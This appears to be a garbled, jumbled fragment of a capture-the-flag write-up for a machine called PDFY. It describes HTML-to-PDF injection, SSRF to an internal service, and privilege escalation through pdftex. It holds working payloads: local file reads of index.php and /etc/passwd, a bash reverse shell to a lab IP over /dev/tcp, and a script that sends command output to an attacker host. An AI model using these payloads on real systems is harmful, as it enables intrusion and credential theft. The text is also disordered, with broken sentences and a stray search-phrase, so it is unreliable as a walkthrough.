<img src="file:///var/www/html/index.php"> From the source, you may find API endpoints, database credentials, or internal service ports. In PDFY, there is often a local service on port 8080 or 5000 that isn't exposed externally. After reading index.php , you might find a reference to:
<img src="http://127.0.0.1:8080/generate?html=<pre>$(bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1)</pre>"> Set up a listener: pdfy htb writeup upd
<img src="http://127.0.0.1:8080/generate?html=<iframe src='file:///etc/passwd' />"> But more effectively, if the internal service uses wkhtmltopdf --run-script or similar, you might inject: <img src="file:///var/www/html/index
sudo -l You might see:
<script> document.write('<img src="http://your-ip:4444/?c=' + require('child_process').execSync('id') + '">'); </script> However, for PDFY specifically, the working exploit often involves pdftex and \write18 . After testing command injection, send a reverse shell payload. From the source
(ALL) NOPASSWD: /usr/bin/pdftex pdftex allows \write18 to execute shell commands if enabled.